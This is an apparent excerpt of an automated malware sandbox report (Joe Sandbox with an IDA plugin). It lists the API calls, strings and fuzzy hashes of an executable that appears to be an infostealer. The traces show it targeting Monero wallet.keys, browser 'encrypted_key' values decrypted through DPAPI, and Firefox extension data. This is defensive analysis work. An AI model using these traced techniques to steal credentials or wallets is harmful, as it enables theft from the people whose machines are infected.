                                • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00E2951E,00000000), ref: 00E28D5B
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00E28D62
                                • wsprintfW.USER32 ref: 00E28D78
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateProcesswsprintf
                                • String ID: %hs
                                • API String ID: 769748085-2783943728
                                • Opcode ID: 87dccda7d42cbe575fafcc23d4cf18bdea6f8e992040c15f50b7ddd1b176cda8
                                • Instruction ID: c966bbe6d5ad2d0d40bbf1074bb5480ae5382c9ff3b2ec2094e2c593e5e6698c
                                • Opcode Fuzzy Hash: 87dccda7d42cbe575fafcc23d4cf18bdea6f8e992040c15f50b7ddd1b176cda8
                                • Instruction Fuzzy Hash: B7E08670B40308FBC710DB94DC09E6A77B8EB04701F000154FD4997240D9765E008B51
                                APIs
                                  • Part of subcall function 00E2A740: lstrcpy.KERNEL32(00E30E17,00000000), ref: 00E2A788
                                  • Part of subcall function 00E2A9B0: lstrlen.KERNEL32(?,008F8B80,?,\Monero\wallet.keys,00E30E17), ref: 00E2A9C5
                                  • Part of subcall function 00E2A9B0: lstrcpy.KERNEL32(00000000), ref: 00E2AA04
                                  • Part of subcall function 00E2A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AA12
                                  • Part of subcall function 00E2A8A0: lstrcpy.KERNEL32(?,00E30E17), ref: 00E2A905
                                  • Part of subcall function 00E28B60: GetSystemTime.KERNEL32(00E30E1A,008FA028,00E305AE,?,?,00E113F9,?,0000001A,00E30E1A,00000000,?,008F8B80,?,\Monero\wallet.keys,00E30E17), ref: 00E28B86
                                  • Part of subcall function 00E2A920: lstrcpy.KERNEL32(00000000,?), ref: 00E2A972
                                  • Part of subcall function 00E2A920: lstrcat.KERNEL32(00000000), ref: 00E2A982
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00E1A2E1
                                • lstrlen.KERNEL32(00000000,00000000), ref: 00E1A3FF
                                • lstrlen.KERNEL32(00000000), ref: 00E1A6BC
                                  • Part of subcall function 00E2A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00E2A7E6
                                • DeleteFileA.KERNEL32(00000000), ref: 00E1A743
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                • String ID:
                                • API String ID: 211194620-0
                                • Opcode ID: 59d92dbbfe058625a93bceb1d3e4839c0accc4f683f2000350883782bea91636
                                • Instruction ID: c3f4bb63dec4e354ca34c779c17d3f451c24628d0c009fb2cea035cbdd591b46
                                • Opcode Fuzzy Hash: 59d92dbbfe058625a93bceb1d3e4839c0accc4f683f2000350883782bea91636
                                • Instruction Fuzzy Hash: 88E11F728101289BCB1CEBA4EC96EEE7378AF58300F549179F51772091EF746A49CB72
                                APIs
                                  • Part of subcall function 00E2A740: lstrcpy.KERNEL32(00E30E17,00000000), ref: 00E2A788
                                  • Part of subcall function 00E2A9B0: lstrlen.KERNEL32(?,008F8B80,?,\Monero\wallet.keys,00E30E17), ref: 00E2A9C5
                                  • Part of subcall function 00E2A9B0: lstrcpy.KERNEL32(00000000), ref: 00E2AA04
                                  • Part of subcall function 00E2A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AA12
                                  • Part of subcall function 00E2A8A0: lstrcpy.KERNEL32(?,00E30E17), ref: 00E2A905
                                  • Part of subcall function 00E28B60: GetSystemTime.KERNEL32(00E30E1A,008FA028,00E305AE,?,?,00E113F9,?,0000001A,00E30E1A,00000000,?,008F8B80,?,\Monero\wallet.keys,00E30E17), ref: 00E28B86
                                  • Part of subcall function 00E2A920: lstrcpy.KERNEL32(00000000,?), ref: 00E2A972
                                  • Part of subcall function 00E2A920: lstrcat.KERNEL32(00000000), ref: 00E2A982
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00E1D481
                                • lstrlen.KERNEL32(00000000), ref: 00E1D698
                                • lstrlen.KERNEL32(00000000), ref: 00E1D6AC
                                • DeleteFileA.KERNEL32(00000000), ref: 00E1D72B
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                • String ID:
                                • API String ID: 211194620-0
                                • Opcode ID: 3b40095ac7eddefe100d25ee6157515b69f02b2bc761f91cd50c1f7a2883d4bd
                                • Instruction ID: 08d1fdb92d740ea84c338eae2241331a031f7b22996b9dc358846f4ecf9936e4
                                • Opcode Fuzzy Hash: 3b40095ac7eddefe100d25ee6157515b69f02b2bc761f91cd50c1f7a2883d4bd
                                • Instruction Fuzzy Hash: 909120729101289BCB18FBA0EC96DEE73B8AF54300F545179F507B3091EF746A49CB62
                                APIs
                                  • Part of subcall function 00E2A740: lstrcpy.KERNEL32(00E30E17,00000000), ref: 00E2A788
                                  • Part of subcall function 00E2A9B0: lstrlen.KERNEL32(?,008F8B80,?,\Monero\wallet.keys,00E30E17), ref: 00E2A9C5
                                  • Part of subcall function 00E2A9B0: lstrcpy.KERNEL32(00000000), ref: 00E2AA04
                                  • Part of subcall function 00E2A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AA12
                                  • Part of subcall function 00E2A8A0: lstrcpy.KERNEL32(?,00E30E17), ref: 00E2A905
                                  • Part of subcall function 00E28B60: GetSystemTime.KERNEL32(00E30E1A,008FA028,00E305AE,?,?,00E113F9,?,0000001A,00E30E1A,00000000,?,008F8B80,?,\Monero\wallet.keys,00E30E17), ref: 00E28B86
                                  • Part of subcall function 00E2A920: lstrcpy.KERNEL32(00000000,?), ref: 00E2A972
                                  • Part of subcall function 00E2A920: lstrcat.KERNEL32(00000000), ref: 00E2A982
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00E1D801
                                • lstrlen.KERNEL32(00000000), ref: 00E1D99F
                                • lstrlen.KERNEL32(00000000), ref: 00E1D9B3
                                • DeleteFileA.KERNEL32(00000000), ref: 00E1DA32
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                • String ID:
                                • API String ID: 211194620-0
                                • Opcode ID: 28a415ed9c9cf74a2b4e2854c53b974cf64e605ce050ebb42ca9f1a3574076ea
                                • Instruction ID: 2e0dccfdb33b1da52b8bf5667a814dd7f7478ac2bab25c1f888b86b0d56167ad
                                • Opcode Fuzzy Hash: 28a415ed9c9cf74a2b4e2854c53b974cf64e605ce050ebb42ca9f1a3574076ea
                                • Instruction Fuzzy Hash: 1A810E729101289BCB18FBA4EC96DEE73B8AF54300F445539F507B7091EF746A49CBA2
                                APIs
                                  • Part of subcall function 00E2A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00E2A7E6
                                  • Part of subcall function 00E199C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E199EC
                                  • Part of subcall function 00E199C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00E19A11
                                  • Part of subcall function 00E199C0: LocalAlloc.KERNEL32(00000040,?), ref: 00E19A31
                                  • Part of subcall function 00E199C0: ReadFile.KERNEL32(000000FF,?,00000000,00E1148F,00000000), ref: 00E19A5A
                                  • Part of subcall function 00E199C0: LocalFree.KERNEL32(00E1148F), ref: 00E19A90
                                  • Part of subcall function 00E199C0: CloseHandle.KERNEL32(000000FF), ref: 00E19A9A
                                  • Part of subcall function 00E28E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00E28E52
                                  • Part of subcall function 00E2A740: lstrcpy.KERNEL32(00E30E17,00000000), ref: 00E2A788
                                  • Part of subcall function 00E2A9B0: lstrlen.KERNEL32(?,008F8B80,?,\Monero\wallet.keys,00E30E17), ref: 00E2A9C5
                                  • Part of subcall function 00E2A9B0: lstrcpy.KERNEL32(00000000), ref: 00E2AA04
                                  • Part of subcall function 00E2A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AA12
                                  • Part of subcall function 00E2A8A0: lstrcpy.KERNEL32(?,00E30E17), ref: 00E2A905
                                  • Part of subcall function 00E2A920: lstrcpy.KERNEL32(00000000,?), ref: 00E2A972
                                  • Part of subcall function 00E2A920: lstrcat.KERNEL32(00000000), ref: 00E2A982
                                • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00E31580,00E30D92), ref: 00E1F54C
                                • lstrlen.KERNEL32(00000000), ref: 00E1F56B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                • String ID: ^userContextId=4294967295$moz-extension+++
                                • API String ID: 998311485-3310892237
                                • Opcode ID: ebbce613f4a40908f4b7d63f00cc0f6a9295f610e0bf97f69366744094046ef6
                                • Instruction ID: 0563d9efdef768516c2c1f49df6074fce70fc0769b5f742442f9662262040c9e
                                • Opcode Fuzzy Hash: ebbce613f4a40908f4b7d63f00cc0f6a9295f610e0bf97f69366744094046ef6
                                • Instruction Fuzzy Hash: C7510172D10118ABDB08FBA0FC56DED77B8AF54300F449539F41677192EE746A09CBA2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy
                                • String ID: s$s$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                • API String ID: 3722407311-3520659465
                                • Opcode ID: 9b0fc912955ab828a5797528b81781b4f70c66319712a3a0085e2361cc8cd7f9
                                • Instruction ID: 48cf1fdb9707667a11200c04ce75a68df7be01a275eb3ea724788c4d1b28be4f
                                • Opcode Fuzzy Hash: 9b0fc912955ab828a5797528b81781b4f70c66319712a3a0085e2361cc8cd7f9
                                • Instruction Fuzzy Hash: 5C5171B1D04228DBDB24EB90EC55BEEB3B4AF44304F2451A8E15577181EB746E88CF55
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen
                                • String ID:
                                • API String ID: 367037083-0
                                • Opcode ID: 53787555341a1fca1e3dea80cf4809127c6c7e21a438fca01f51bf5a29816cea
                                • Instruction ID: 03023b1f4276f2b188d010e5b2bbf5992e43fa57b3c290cb1a07fd40ab37ef8c
                                • Opcode Fuzzy Hash: 53787555341a1fca1e3dea80cf4809127c6c7e21a438fca01f51bf5a29816cea
                                • Instruction Fuzzy Hash: 254131B1D10219EFCB08EFB4E859AFEB7B8AF44304F049429E41677251DB759A05CFA1
                                APIs
                                  • Part of subcall function 00E2A740: lstrcpy.KERNEL32(00E30E17,00000000), ref: 00E2A788
                                  • Part of subcall function 00E199C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E199EC
                                  • Part of subcall function 00E199C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00E19A11
                                  • Part of subcall function 00E199C0: LocalAlloc.KERNEL32(00000040,?), ref: 00E19A31
                                  • Part of subcall function 00E199C0: ReadFile.KERNEL32(000000FF,?,00000000,00E1148F,00000000), ref: 00E19A5A
                                  • Part of subcall function 00E199C0: LocalFree.KERNEL32(00E1148F), ref: 00E19A90
                                  • Part of subcall function 00E199C0: CloseHandle.KERNEL32(000000FF), ref: 00E19A9A
                                  • Part of subcall function 00E28E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00E28E52
                                • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00E19D39
                                  • Part of subcall function 00E19AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 00E19AEF
                                  • Part of subcall function 00E19AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00E14EEE,00000000,?), ref: 00E19B01
                                  • Part of subcall function 00E19AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 00E19B2A
                                  • Part of subcall function 00E19AC0: LocalFree.KERNEL32(?,?,?,?,00E14EEE,00000000,?), ref: 00E19B3F
                                  • Part of subcall function 00E19B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00E19B84
                                  • Part of subcall function 00E19B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00E19BA3
                                  • Part of subcall function 00E19B60: LocalFree.KERNEL32(?), ref: 00E19BD3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                • String ID: $"encrypted_key":"$DPAPI
                                • API String ID: 2100535398-738592651
                                • Opcode ID: 94faadb114e69c364ef37cc27dd6feeed0bed33f7ff25334ba3f8f590278af44
                                • Instruction ID: b484fc0810d8dfade579e30176162f82342f241b00bb711a61284dc3d08c961f
                                • Opcode Fuzzy Hash: 94faadb114e69c364ef37cc27dd6feeed0bed33f7ff25334ba3f8f590278af44
                                • Instruction Fuzzy Hash: B7314DB6D10209ABCF04DFE4EC95AEFB7B8BF48304F145559E905B7242EB309A44CBA1
                                APIs
                                • __getptd.LIBCMT ref: 00E2C74E
                                  • Part of subcall function 00E2BF9F: __amsg_exit.LIBCMT ref: 00E2BFAF
                                • __getptd.LIBCMT ref: 00E2C765
                                • __amsg_exit.LIBCMT ref: 00E2C773
                                • __updatetlocinfoEx_nolock.LIBCMT ref: 00E2C797
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                • String ID:
                                • API String ID: 300741435-0
                                • Opcode ID: b24b37fadb6c4b614efa3cbe7f4d5136a8009bfd42b68a73da47473cb25eba8d
                                • Instruction ID: 50aaf90e2d2e7a67b4f448e4dbd4af0bd3b0a8860284343e1c331537ab52d45c
                                • Opcode Fuzzy Hash: b24b37fadb6c4b614efa3cbe7f4d5136a8009bfd42b68a73da47473cb25eba8d
                                • Instruction Fuzzy Hash: 05F09A32A007349BE721BBB8BC0AB5E37E06F00724F39624AF555B61D2DB6859809E56
                                APIs
                                  • Part of subcall function 00E28DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00E28E0B
                                • lstrcat.KERNEL32(?,00000000), ref: 00E24F7A
                                • lstrcat.KERNEL32(?,00E31070), ref: 00E24F97
                                • lstrcat.KERNEL32(?,008F8AA0), ref: 00E24FAB
                                • lstrcat.KERNEL32(?,00E31074), ref: 00E24FBD
                                  • Part of subcall function 00E24910: wsprintfA.USER32 ref: 00E2492C
                                  • Part of subcall function 00E24910: FindFirstFileA.KERNEL32(?,?), ref: 00E24943
                                  • Part of subcall function 00E24910: StrCmpCA.SHLWAPI(?,00E30FDC), ref: 00E24971
                                  • Part of subcall function 00E24910: StrCmpCA.SHLWAPI(?,00E30FE0), ref: 00E24987
                                  • Part of subcall function 00E24910: FindNextFileA.KERNEL32(000000FF,?), ref: 00E24B7D
                                  • Part of subcall function 00E24910: FindClose.KERNEL32(000000FF), ref: 00E24B92
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                • String ID:
                                • API String ID: 2667927680-0
                                • Opcode ID: d0a0d6473ef319fe7482fb16661452ee0f5cc9396202abbb9a3ef01e5212ba74
                                • Instruction ID: 0b9f0127210b003328d9d12ff5e4bf737aeb0ab5979d54c27a671c9daf14195f
                                • Opcode Fuzzy Hash: d0a0d6473ef319fe7482fb16661452ee0f5cc9396202abbb9a3ef01e5212ba74
                                • Instruction Fuzzy Hash: 2D21A0B6A0031897C764F770EC46EEE377CA754300F005694B699A3185DE7596C8CF91